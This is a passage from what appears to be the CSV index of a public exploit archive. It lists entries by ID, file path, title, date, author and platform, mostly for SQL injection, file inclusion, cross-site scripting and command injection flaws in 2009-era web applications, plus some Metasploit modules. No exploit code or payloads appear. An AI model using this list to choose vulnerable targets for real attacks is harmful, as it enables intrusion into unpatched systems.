Management/Inventory System - 'header.php' Remote File Inclusion",2009-09-18,"EA Ngel",multiple,webapps, -9719,exploits/multiple/webapps/9719.txt,"FanUpdate 2.2.1 - 'show-cat.php' SQL Injection",2009-09-18,"(In)Security Romania",multiple,webapps, -9720,exploits/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusions",2009-09-18,NoGe,multiple,webapps, -9721,exploits/multiple/webapps/9721.txt,"Joomla! Component com_surveymanager 1.5.0 - 'stype' SQL Injection",2009-09-21,kaMtiEz,multiple,webapps, -9722,exploits/multiple/webapps/9722.txt,"DDL CMS 1.0 - Multiple Remote File Inclusions",2009-09-21,HxH,multiple,webapps, -9723,exploits/multiple/webapps/9723.txt,"Joomla! Component com_jbudgetsmagic 0.3.2 < 0.4.0 - 'bid' SQL Injection",2009-09-21,kaMtiEz,multiple,webapps, -9724,exploits/multiple/webapps/9724.txt,"BAnner ROtation System mini - Multiple Remote File Inclusions",2009-09-21,"EA Ngel",multiple,webapps, -9726,exploits/multiple/webapps/9726.py,"cP Creator 2.7.1 - SQL Injection",2009-09-21,"Sina Yazdanmehr",multiple,webapps, -9727,exploits/multiple/webapps/9727.txt,"CMScontrol (Content Management Portal Solutions) - SQL Injection",2009-09-21,ph1l1ster,multiple,webapps, -9728,exploits/multiple/webapps/9728.txt,"ProdLer 2.0 - Remote File Inclusion",2009-09-21,cr4wl3r,multiple,webapps, -9729,exploits/multiple/webapps/9729.txt,"Loggix Project 9.4.5 - Multiple Remote File Inclusions",2009-09-21,cr4wl3r,multiple,webapps, -9730,exploits/multiple/webapps/9730.txt,"WX Guestbook 1.1.208 - SQL Injection / Persistent Cross-Site Scripting",2009-09-21,learn3r,multiple,webapps, -9732,exploits/multiple/webapps/9732.txt,"Joomla! Component com_jinc 0.2 - 'newsid' Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps, -9733,exploits/multiple/webapps/9733.pl,"Joomla! Component com_mytube (user_id) 1.0 Beta - Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps, -9801,exploits/php/webapps/9801.txt,"Flatpress 0.804 < 0.812.1 - Local File Inclusion",2009-09-29,"Giuseppe Fuggiano",php,webapps, -9809,exploits/asp/webapps/9809.txt,"HEAT Call Logging 8.01 - SQL Injection",2009-09-28,"0 0",asp,webapps, -9812,exploits/php/webapps/9812.txt,"Joomla! Component IRCm Basic - SQL Injection",2009-09-28,kaMtiEz,php,webapps, -9818,exploits/php/webapps/9818.txt,"Klonet E-Commerce - 'products.php' SQL Injection",2009-09-25,S3T4N,php,webapps, -9819,exploits/multiple/webapps/9819.txt,"Engeman 6.x - SQL Injection",2009-09-25,crashbrz,multiple,webapps, -9820,exploits/php/webapps/9820.txt,"Regental Medien - Blind SQL Injection",2009-09-24,NoGe,php,webapps, -9821,exploits/php/webapps/9821.txt,"FSphp 0.2.1 - Remote File Inclusion",2009-09-24,NoGe,php,webapps, -9822,exploits/php/webapps/9822.txt,"Joomla! Component Fastball 1.1.0 < 1.2 - SQL Injection",2009-09-24,kaMtiEz,php,webapps, -9824,exploits/php/webapps/9824.txt,"Swiss Mango CMS - SQL Injection",2009-09-24,kaMtiEz,php,webapps, -9825,exploits/php/webapps/9825.txt,"e107 0.7.16 - Referer header Cross-Site Scripting",2009-09-24,MustLive,php,webapps, -9826,exploits/php/webapps/9826.txt,"MindSculpt CMS - SQL Injection",2009-09-24,kaMitEz,php,webapps, -9828,exploits/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection / Cross-Site Scripting",2009-09-23,"Alexey Sintsov",php,webapps, -9830,exploits/php/webapps/9830.txt,"Cour Supreme - SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps, -9832,exploits/php/webapps/9832.txt,"Joomla! / Mambo Component Tupinambis - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps, -9833,exploits/php/webapps/9833.txt,"Joomla! Component com_facebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps, -9834,exploits/asp/webapps/9834.txt,"BPLawyerCaseDocuments - SQL Injection",2009-09-22,"OoN Boy",asp,webapps, -9835,exploits/php/webapps/9835.txt,"HB CMS 1.7 - SQL Injection",2009-09-22,"Securitylab Security Research",php,webapps, -9836,exploits/php/webapps/9836.txt,"BPMusic 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",php,webapps, -9837,exploits/php/webapps/9837.txt,"BPStudent 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",php,webapps, -9838,exploits/php/webapps/9838.pl,"BPGames 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",php,webapps, -9839,exploits/php/webapps/9839.txt,"Achievo 1.3.4 - Remote File Inclusion",2009-09-22,M3NW5,php,webapps, -9840,exploits/php/webapps/9840.txt,"Joomla! Component GroupJive 1.8 B4 - Remote File Inclusion",2009-09-22,M3NW5,php,webapps, -9841,exploits/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps, -9847,exploits/php/webapps/9847.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (1)",2009-11-04,Abysssec,php,webapps, -9849,exploits/php/webapps/9849.php,"PunBB Extension Attachment 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps, -9850,exploits/php/webapps/9850.txt,"Xerox Fiery Webtools - SQL Injection",2009-11-03,"Bernardo Trigo",php,webapps, -9854,exploits/php/webapps/9854.txt,"TFTgallery .13 - Directory Traversal",2009-11-02,blake,php,webapps, -9855,exploits/php/webapps/9855.txt,"Geeklog 1.6.0sr2 - Arbitrary File Upload",2009-10-03,JaL0h,php,webapps, -9856,exploits/asp/webapps/9856.txt,"Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,"Andrea Fabrizi",asp,webapps, -9857,exploits/asp/webapps/9857.txt,"AfterLogic WebMail Pro 4.7.10 - Cross-Site Scripting",2009-10-05,"Sébastien Duquette",asp,webapps, -9861,exploits/unix/webapps/9861.rb,"Nagios3 - 'statuswml.cgi' Command Injection (Metasploit)",2009-10-30,"H D Moore",unix,webapps, -9863,exploits/php/webapps/9863.txt,"Achievo 1.3.4 - Cross-Site Scripting",2009-10-14,"Ryan Dewhurst",php,webapps, -9867,exploits/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 - Path Disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps, -9872,exploits/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",multiple,webapps, -9873,exploits/windows/webapps/9873.txt,"Cherokee 0.5.4 - Directory Traversal",2009-10-28,Dr_IDE,windows,webapps, -9875,exploits/php/webapps/9875.txt,"CubeCart 4 - Session Management Bypass",2009-10-30,"Bogdan Calin",php,webapps, -9876,exploits/php/webapps/9876.txt,"DeDeCMS 5.1 - SQL Injection",2009-10-14,"Securitylab Security Research",php,webapps, -9877,exploits/asp/webapps/9877.txt,"DWebPro - Command Injection",2009-10-17,"Rafael Sousa",asp,webapps, -9880,exploits/php/webapps/9880.txt,"eNdonesia CMS 8.4 - Local File Inclusion",2009-11-04,s4r4d0,php,webapps, -9885,exploits/windows/webapps/9885.txt,"httpdx 1.4.6b - Source Disclosure",2009-10-21,Dr_IDE,windows,webapps, -9887,exploits/jsp/webapps/9887.txt,"jetty 6.x < 7.x - Cross-Site Scripting / Information Disclosure / Injection",2009-10-26,"Antonion Parata",jsp,webapps, -9888,exploits/php/webapps/9888.txt,"Joomla! Component Ajax Chat 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps, -9889,exploits/php/webapps/9889.txt,"Joomla! Component Book Library 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps, -9890,exploits/php/webapps/9890.txt,"Joomla! Plugin JD-WordPress 2.0 RC2 - Remote File Inclusion",2009-10-19,"Don Tukulesto",php,webapps, -9891,exploits/php/webapps/9891.txt,"Joomla! Component Jshop - SQL Injection",2009-10-23,"Don Tukulesto",php,webapps, -9892,exploits/php/webapps/9892.txt,"Joomla! Component Photo Blog alpha 3 < alpha 3a - SQL Injection",2009-10-23,kaMtiEz,php,webapps, -9897,exploits/php/webapps/9897.txt,"Mongoose Web Server 2.8 - Source Disclosure",2009-10-23,Dr_IDE,php,webapps, -9898,exploits/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Path Disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps, -9903,exploits/php/webapps/9903.txt,"OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection",2009-10-20,"Amol Naik",php,webapps, -9904,exploits/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps, -9906,exploits/php/webapps/9906.rb,"Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps, -9907,exploits/cgi/webapps/9907.rb,"The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include",1999-11-05,patrick,cgi,webapps, -9908,exploits/php/webapps/9908.rb,"BASE 1.2.4 - 'base_qry_common.php' Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps, -9909,exploits/cgi/webapps/9909.rb,"AWStats 6.4 < 6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)",2006-05-04,patrick,cgi,webapps, -9911,exploits/php/webapps/9911.rb,"Cacti 0.8.6-d - 'graph_view.php' Command Injection (Metasploit)",2005-01-15,"David Maciejak",php,webapps, -9912,exploits/cgi/webapps/9912.rb,"AWStats 6.2 < 6.1 - configdir Command Injection (Metasploit)",2005-01-15,"Matteo Cantoni",cgi,webapps, -9916,exploits/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 - Command Execution (Metasploit)",2009-02-25,patrick,multiple,webapps, -9922,exploits/php/webapps/9922.txt,"Oscailt CMS 3.3 - Local File Inclusion",2009-10-28,s4r4d0,php,webapps, -9926,exploits/php/webapps/9926.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Execution",2009-07-22,spinbad,php,webapps, -9933,exploits/php/webapps/9933.txt,"PHP168 6.0 - Command Execution",2009-10-28,"Securitylab Security Research",php,webapps, -9958,exploits/jsp/webapps/9958.txt,"Pentaho 1.7.0.1062 - Cross-Site Scripting / Information Disclosure",2009-10-15,antisnatchor,jsp,webapps, -9961,exploits/php/webapps/9961.txt,"phpCMS 2008 - File Disclosure",2009-10-19,"Securitylab Security Research",php,webapps, -16007,exploits/php/webapps/16007.txt,"AneCMS 1.3 - Persistent Cross-Site Scripting",2011-01-17,Penguin,php,webapps, -9962,exploits/php/webapps/9962.txt,"Piwik 1357 2009-08-02 - Arbitrary File Upload / Code Execution",2009-10-19,boecke,php,webapps, -9963,exploits/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps, -9964,exploits/php/webapps/9964.txt,"RunCMS 2m1 - 'store()' SQL Injection",2009-10-26,bookoo,php,webapps, -9965,exploits/php/webapps/9965.txt,"RunCMS 2ma - 'post.php' SQL Injection",2009-10-26,bookoo,php,webapps, -9967,exploits/asp/webapps/9967.txt,"SharePoint 2007 - Team Services Source Code Disclosure",2009-10-26,"Daniel Martin",asp,webapps, -33434,exploits/windows/webapps/33434.rb,"HP Release Control - Authenticated XML External Entity (Metasploit)",2014-05-19,"Brandon Perry",windows,webapps,80 -9975,exploits/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Cross-Site Scripting / Cross-Site Request Forgery",2009-11-16,"Alexey Sintsov",hardware,webapps,80 -9978,exploits/php/webapps/9978.txt,"TwonkyMedia Server 4.4.17/5.0.65 - Cross-Site Scripting",2009-10-23,"Davide Canali",php,webapps, -9979,exploits/php/webapps/9979.txt,"Vivvo CMS 4.1.5.1 - file Disclosure",2009-10-22,"Janek Vind",php,webapps, -9981,exploits/hardware/webapps/9981.txt,"Websense Email Security - Cross-Site Scripting",2009-10-20,"Nikolas Sotiriu",hardware,webapps, -10002,exploits/php/webapps/10002.txt,"CuteNews and UTF-8 CuteNews - Multiple Vulnerabilities",2009-11-10,"Andrew Horton",php,webapps, -10003,exploits/php/webapps/10003.txt,"Docebo 3.6.0.3 - Multiple SQL Injections",2009-10-09,"Andrea Fabrizi",php,webapps, -10006,exploits/php/webapps/10006.txt,"DreamPoll 3.1 - SQL Injection",2009-10-08,"Mark from infosecstuff",php,webapps, -10012,exploits/multiple/webapps/10012.py,"html2ps - 'include file' Server-Side Include Directive Directory Traversal",2009-09-25,epiphant,multiple,webapps, -10013,exploits/jsp/webapps/10013.txt,"Hyperic HQ 3.2 < 4.2-beta1 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-02,CoreLabs,jsp,webapps, -10016,exploits/php/webapps/10016.pl,"Joomla! Component JForJoomla! Jreservation 1.5 - 'pid' SQL Injection",2009-11-10,"Chip d3 bi0s",php,webapps, -10031,exploits/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server 7.1 - masterCGI Command Injection (Metasploit)",2007-09-17,patrick,cgi,webapps,443 -10042,exploits/php/webapps/10042.txt,"Achievo 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps, -10043,exploits/php/webapps/10043.txt,"redcat media - SQL Injection",2009-10-02,s4va,php,webapps, -10045,exploits/php/webapps/10045.txt,"Community Translate - Remote File Inclusion",2009-10-12,NoGe,php,webapps, -10046,exploits/php/webapps/10046.txt,"Dazzle Blast - Remote File Inclusion",2009-10-12,NoGe,php,webapps, -10049,exploits/php/webapps/10049.pl,"EZsneezyCal CMS 95.1-95.2 - Remote File Inclusion",2009-10-12,kaMtiEz,php,webapps, -10050,exploits/php/webapps/10050.pl,"EZRecipeZee CMS 91 - Remote File Inclusion",2009-10-12,kaMtiEz,php,webapps, -10051,exploits/php/webapps/10051.txt,"QuickCart 3.x - Cross-Site Scripting / Cross-Site Request Forgery / Local File Inclusion / Directory Traversal",2009-10-08,kl3ryk,php,webapps, -10052,exploits/php/webapps/10052.txt,"The BMW - 'inventory.php' SQL Injection",2009-10-08,Dazz,php,webapps, -10057,exploits/php/webapps/10057.txt,"AIOCP 1.4.001 - Remote File Inclusion",2009-10-07,"Hadi Kiamarsi",php,webapps, -10058,exploits/php/webapps/10058.pl,"Joomla! Component Recerca - SQL Injection",2009-10-07,"Don Tukulesto",php,webapps, -10059,exploits/jsp/webapps/10059.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Information Disclosure",2009-11-12,"Daniel King",jsp,webapps, -10061,exploits/jsp/webapps/10061.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-11-12,"Daniel King",jsp,webapps, -10064,exploits/php/webapps/10064.txt,"Joomla! Component CB Resume Builder - SQL Injection",2009-10-05,kaMtiEz,php,webapps, -10067,exploits/php/webapps/10067.txt,"Joomla! Component Soundset 1.0 - SQL Injection",2009-10-05,kaMtiEz,php,webapps, -10069,exploits/php/webapps/10069.php,"Empire CMS 47 - SQL Injection",2009-10-05,"Securitylab Security Research",php,webapps, -10074,exploits/novell/webapps/10074.txt,"Novell eDirectory 8.8 SP5 - 'dconserv.dlm' Cross-Site Scripting",2009-10-01,"Francis Provencher",novell,webapps,8030 -10075,exploits/novell/webapps/10075.txt,"Novell Edirectory 8.8 SP5 - Cross-Site Scripting",2009-09-23,"Francis Provencher",novell,webapps,8030 -33477,exploits/php/webapps/33477.txt,"Calendarix 0.7 - 'calpath' Remote File Inclusion",2010-01-07,Saywhat,php,webapps, -33428,exploits/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 < 7.4 / Sentinel Keys Server 1.0.3 < 1.0.4 - Directory Traversal",2014-05-19,"Matt Schmidt",windows,webapps,7002 -10082,exploits/php/webapps/10082.txt,"PBBoard 2.0.2 - Full Path Disclosure",2009-10-06,rUnViRuS,php,webapps, -10085,exploits/jsp/webapps/10085.txt,"toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities",2009-11-07,"Alberto Trivero",jsp,webapps, -10088,exploits/php/webapps/10088.txt,"WordPress 2.0 < 2.7.1 - 'admin.php' Module Configuration Security Bypass",2009-11-10,"Fernando Arnaboldi",php,webapps, -10089,exploits/php/webapps/10089.txt,"WordPress < 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",php,webapps, -10090,exploits/php/webapps/10090.txt,"WordPress MU 1.2.2 < 1.3.1 - '/wp-includes/wpmu-functions.php' Cross-Site Scripting",2009-11-10,"Juan Galiana Lara",php,webapps, -10094,exploits/jsp/webapps/10094.txt,"IBM Rational RequisitePro 7.10 / ReqWebHelp - Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,IBM,jsp,webapps, -10096,exploits/php/webapps/10096.txt,"OS Commerce 2.2r2 - Authentication Bypass",2009-11-13,"Stuart Udall",php,webapps, -10101,exploits/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps, -10105,exploits/php/webapps/10105.txt,"Cifshanghai - 'chanpin_info.php' CMS SQL Injection",2009-11-16,ProF.Code,php,webapps, -40083,exploits/php/webapps/40083.txt,"WordPress Plugin Activity Log 2.3.1 - Persistent Cross-Site Scripting",2016-07-11,"Han Sahin",php,webapps,80 -10161,exploits/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration Panel Bypass / Arbitrary File Upload",2009-11-17,blackenedsecurity,asp,webapps, -10165,exploits/php/webapps/10165.txt,"TelebidAuctionScript - 'aid' Blind SQL Injection",2009-11-17,"Hussin X",php,webapps, -10166,exploits/asp/webapps/10166.txt,"ActiveTrade 2.0 - 'default.asp' Blind SQL Injection",2009-11-17,"Hussin X",asp,webapps, -10167,exploits/asp/webapps/10167.txt,"ActiveBids - 'default.asp' Blind SQL Injection",2009-11-17,"Hussin X",asp,webapps, -10168,exploits/php/webapps/10168.txt,"Shoutbox 1.0 - HTML / Cross-Site Scripting Injection",2009-11-18,SkuLL-HackeR,php,webapps, -10169,exploits/php/webapps/10169.txt,"phpMyBackupPro - Arbitrary File Download",2009-11-16,"Amol Naik",php,webapps, -10170,exploits/multiple/webapps/10170.txt,"Xerver 4.31/4.32 - HTTP Response Splitting",2009-11-18,s4squatch,multiple,webapps,80 -10177,exploits/php/webapps/10177.txt,"Joomla! Extension iF Portfolio Nexus - SQL Injection",2009-11-18,"599eme Man",php,webapps, -10178,exploits/php/webapps/10178.txt,"Joomla! / Mambo Component D4J eZine 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps, -10180,exploits/php/webapps/10180.txt,"Simplog 0.9.3.2 - Multiple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps, -10181,exploits/php/webapps/10181.txt,"Bitrix Site Manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps, -10183,exploits/php/webapps/10183.php,"Joomla! 1.5.12 TinyMCE - Remote Code Execution (via Arbitrary File Upload)",2009-11-19,daath,php,webapps,80 -10189,exploits/php/webapps/10189.txt,"Betsy CMS versions 3.5 - Local File Inclusion",2009-11-21,MizoZ,php,webapps, -10192,exploits/php/webapps/10192.txt,"Joomla! Component Com_Joomclip - 'cat' SQL Injection",2009-11-21,"599eme Man",php,webapps, -10209,exploits/multiple/webapps/10209.txt,"Everfocus 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",multiple,webapps, -40303,exploits/cgi/webapps/40303.sh,"Intellinet IP Camera INT-L100M20N - Unauthorized Admin Credential Change",2016-08-29,"Todor Donev",cgi,webapps,80 -40304,exploits/cgi/webapps/40304.txt,"PLC Wireless Router GPN2.4P21-C-CN - Arbitrary File Disclosure",2016-08-29,"Rahul Raz",cgi,webapps,80 -10214,exploits/php/webapps/10214.txt,"Joomla! Component mygallery - 'farbinform_krell' SQL Injection",2009-11-23,"Manas58 BAYBORA",php,webapps, -10216,exploits/php/webapps/10216.txt,"kr-web 1.1b2 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps, -10217,exploits/php/webapps/10217.txt,"NukeHall 0.3 - Multiple Remote File Inclusions",2009-11-24,cr4wl3r,php,webapps, -10218,exploits/php/webapps/10218.txt,"outreach project tool 1.2.6 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps, -10219,exploits/php/webapps/10219.txt,"phptraverse 0.8.0 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps, -10220,exploits/php/webapps/10220.txt,"pointcomma 3.8b2 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps, -10222,exploits/php/webapps/10222.txt,"W3infotech - Authentication Bypass",2009-11-24,ViRuS_HiMa,php,webapps, -10224,exploits/php/webapps/10224.txt,"Quick.Cart 3.4 / Quick.CMS 2.4 - Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps, -10225,exploits/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL Injection",2006-05-26,KOUSULIN,windows,webapps,1000 -10227,exploits/php/webapps/10227.txt,"Joomla! Component com_mygallery - 'cid' SQL Injection",2009-11-25,S@BUN,php,webapps, -10228,exploits/php/webapps/10228.txt,"WordPress Plugin WP-Cumulus 1.20 - Full Path Disclosure / Cross-Site Scripting",2009-11-25,MustLive,php,webapps, -10230,exploits/php/webapps/10230.txt,"Fake Hit Generator 2.2 - Arbitrary File Upload",2009-11-25,DigitALL,php,webapps, -10231,exploits/php/webapps/10231.txt,"Radio istek scripti 2.5 - Remote Configuration Disclosure",2009-11-25,"kurdish hackers team",php,webapps, -10232,exploits/php/webapps/10232.txt,"Joomla! Component com_gcalendar 1.1.2 - 'gcid' SQL Injection",2009-11-25,"Yogyacarderlink Crew",php,webapps, -10233,exploits/php/webapps/10233.txt,"phpBazar-2.1.1fix - Remote Administration-Panel",2009-11-25,"kurdish hackers team",php,webapps, -10234,exploits/php/webapps/10234.txt,"Cacti 0.8.7e - Multiple Vulnerabilities",2009-11-26,"Moritz Naumann",php,webapps, -10236,exploits/php/webapps/10236.txt,"Flashden - Multiple Arbitrary File Uploads",2009-11-26,DigitALL,php,webapps, -10238,exploits/php/webapps/10238.txt,"Joomla! Component com_lyftenbloggie 1.04 - SQL Injection",2009-11-28,kaMtiEz,php,webapps, -10241,exploits/php/webapps/10241.txt,"Uploaderr 1.0 File Hosting Script - Arbitrary File Upload",2009-11-28,DigitALL,php,webapps, -10245,exploits/php/webapps/10245.txt,"phpBazar 2.1.1fix - 'cid' SQL Injection",2009-11-28,MizoZ,php,webapps, -10246,exploits/php/webapps/10246.txt,"SweetRice 0.5.3 - Remote File Inclusion",2009-11-29,cr4wl3r,php,webapps, -10247,exploits/hardware/webapps/10247.txt,"Micronet SP1910 Data Access Controller UI - Cross-Site Scripting / HTML Code Injection",2009-11-27,K053,hardware,webapps, -10248,exploits/php/webapps/10248.txt,"Sugar CRM 5.5.0.rc2/5.2.0j - Multiple Vulnerabilities",2009-11-29,waraxe,php,webapps, -10249,exploits/php/webapps/10249.txt,"AdaptCMS Lite 1.5 - Remote File Inclusion",2009-11-29,v3n0m,php,webapps, -10250,exploits/php/webapps/10250.txt,"Joomla! Component MusicGallery - SQL Injection",2009-11-30,"Don Tukulesto",php,webapps, -10252,exploits/php/webapps/10252.txt,"Joomla! Component Quick News - SQL Injection",2009-11-30,"Don Tukulesto",php,webapps, -10253,exploits/asp/webapps/10253.txt,"Eshopbuilde CMS - SQL Injection",2009-11-30,Isfahan,asp,webapps, -10254,exploits/asp/webapps/10254.txt,"Xxasp 3.3.2 - SQL Injection",2009-11-30,Secu_lab_ir,asp,webapps, -10256,exploits/php/webapps/10256.txt,"WordPress Plugin WP-Polls 2.x - Incorrect Flood Filter",2009-11-30,Jbyte,php,webapps, -10259,exploits/php/webapps/10259.txt,"Ciamos CMS 0.9.5 - 'module_path' Remote File Inclusion",2009-12-01,cr4wl3r,php,webapps, -10260,exploits/php/webapps/10260.txt,"Robert Zimmerman PHP / MySQL Scripts - Authentication Bypass",2009-12-01,DUNDEE,php,webapps, -10261,exploits/linux/webapps/10261.txt,"dotDefender 3.8-5 - Remote Command Execution",2009-12-01,"John Dos",linux,webapps,80 -10262,exploits/linux/webapps/10262.txt,"ISPworker 1.23 - Remote File Disclosure",2009-12-01,cr4wl3r,linux,webapps,80 -10263,exploits/linux/webapps/10263.txt,"Quate CMS 0.3.5 - Local/Remote File Inclusion",2009-12-01,cr4wl3r,linux,webapps,80 -10272,exploits/php/webapps/10272.txt,"Joomla! Component Joaktree 1.0 - SQL Injection",2009-12-01,"Don Tukulesto",php,webapps, -10273,exploits/php/webapps/10273.txt,"Joomla! Component MojoBlog 0.15 - Multiple Remote File Inclusions",2009-12-01,kaMtiEz,php,webapps, -10274,exploits/php/webapps/10274.txt,"Simple Machines Forum (SMF) 1.1.10/2.0 RC2 - Multiple Vulnerabilities",2009-12-02,"SimpleAudit Team",php,webapps, -10275,exploits/php/webapps/10275.txt,"Kide Shoutbox 0.4.6 - Cross-Site Scripting / AXFR",2009-12-02,andresg888,php,webapps, -10276,exploits/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router - Multiple Vulnerabilities",2009-12-03,DecodeX01,hardware,webapps, -10277,exploits/php/webapps/10277.txt,"Thatware 0.5.3 - Multiple Remote File Inclusions",2009-12-03,cr4wl3r,php,webapps, -10284,exploits/php/webapps/10284.txt,"ita-forum 5.1.32 - SQL Injection",2009-11-30,BAYBORA,php,webapps, -10285,exploits/php/webapps/10285.txt,"Public Media Manager - Remote File Inclusion",2009-12-01,cr4wl3r,php,webapps, -10286,exploits/php/webapps/10286.txt,"OpenCSP - Multiple Remote File Inclusions",2009-11-25,EANgel,php,webapps, -10287,exploits/php/webapps/10287.txt,"MundiMail 0.8.2 - Remote Code Execution",2009-09-07,Dedalo,php,webapps, -10288,exploits/php/webapps/10288.txt,"SAPID SHOP 1.3 - Remote File Inclusion",2009-12-03,cr4wl3r,php,webapps, -10289,exploits/php/webapps/10289.txt,"Power BB 1.8.3 - Remote File Inclusions",2009-11-25,DigitALL,php,webapps, -10290,exploits/php/webapps/10290.txt,"Theeta CMS - Multiple Vulnerabilities",2009-12-03,c0dy,php,webapps, -10291,exploits/php/webapps/10291.txt,"Joomla! Component ProofReader 1.0 RC6 - Cross-Site Scripting",2009-12-01,MustLive,php,webapps, -10292,exploits/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,multiple,webapps, -10293,exploits/php/webapps/10293.txt,"PHP-Nuke 8.0 - News Module Cross-Site Scripting / HTML Code Injection",2009-11-27,K053,php,webapps, -10294,exploits/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion",2009-11-24,"Don Tukulesto",php,webapps, -10297,exploits/php/webapps/10297.php,"Vivid Ads Shopping Cart - 'prodid' SQL Injection",2009-12-03,"Yakir Wizman",php,webapps, -10299,exploits/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX & Cr3W-DZ",php,webapps, -10302,exploits/php/webapps/10302.txt,"427BB 2.3.2 - SQL Injection",2009-12-04,cr4wl3r,php,webapps, -10304,exploits/php/webapps/10304.txt,"Invision Power Board 2.3.6/3.0.4 - Local File Inclusion / SQL Injection",2009-12-04,"Dawid Golunski",php,webapps, -10305,exploits/php/webapps/10305.txt,"UBBCentral UBB.Threads 7.5.4 2 - Multiple File Inclusions",2009-12-04,R3VAN_BASTARD,php,webapps, -10306,exploits/php/webapps/10306.txt,"Achievo 1.4.2 - Arbitrary File Upload",2009-12-04,"Nahuel Grisolia",php,webapps, -10307,exploits/php/webapps/10307.txt,"Achievo 1.4.2 - Persistent Cross-Site Scripting",2009-12-04,"Nahuel Grisolia",php,webapps, -10312,exploits/php/webapps/10312.php,"Joomla! Component com_joomgallery 1.5.x - &func Incorrect Flood Filter",2009-12-04,Jbyte,php,webapps, -10314,exploits/php/webapps/10314.txt,"BM Classifieds Ads - SQL Injection",2009-12-04,"Dr.0rYX & Cr3W-DZ",php,webapps, -10318,exploits/php/webapps/10318.txt,"Joomla! Component yt_color YOOOtheme - Cross-Site Scripting / Cookie Stealing",2009-12-04,andresg888,php,webapps,80 -10324,exploits/php/webapps/10324.txt,"phpShop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps, -10325,exploits/php/webapps/10325.txt,"WordPress Plugin Image Manager - Arbitrary File Upload",2009-12-05,DigitALL,php,webapps, -10329,exploits/php/webapps/10329.txt,"AROUNDMe 1.1 - 'language_path' Remote File Inclusion",2009-12-06,cr4wl3r,php,webapps, -10330,exploits/php/webapps/10330.txt,"Elkagroup - SQL Injection",2009-12-06,SadHaCkEr,php,webapps, -10331,exploits/windows/webapps/10331.txt,"iWeb HTTP Server - Directory Traversal",2009-12-06,mr_me,windows,webapps, -10337,exploits/php/webapps/10337.txt,"Chipmunk NewsLetter - Persistent Cross-Site Scripting",2009-12-07,mr_me,php,webapps, -10341,exploits/php/webapps/10341.txt,"SiSplet CMS 2008-01-24 - Multiple Remote File Inclusions",2009-12-07,cr4wl3r,php,webapps, -10347,exploits/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 - Multiple Vulnerabilities",2009-12-07,Global-Evolution,hardware,webapps, -10350,exploits/php/webapps/10350.txt,"IRAN N.E.T E-Commerce Group - SQL Injection",2009-12-08,"Dr.0rYX & Cr3W-DZ",php,webapps, -10351,exploits/php/webapps/10351.txt,"MarieCMS 0.9 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-12-07,"Amol Naik",php,webapps, -10354,exploits/php/webapps/10354.txt,"Viscacha 0.8 Gold - Persistent 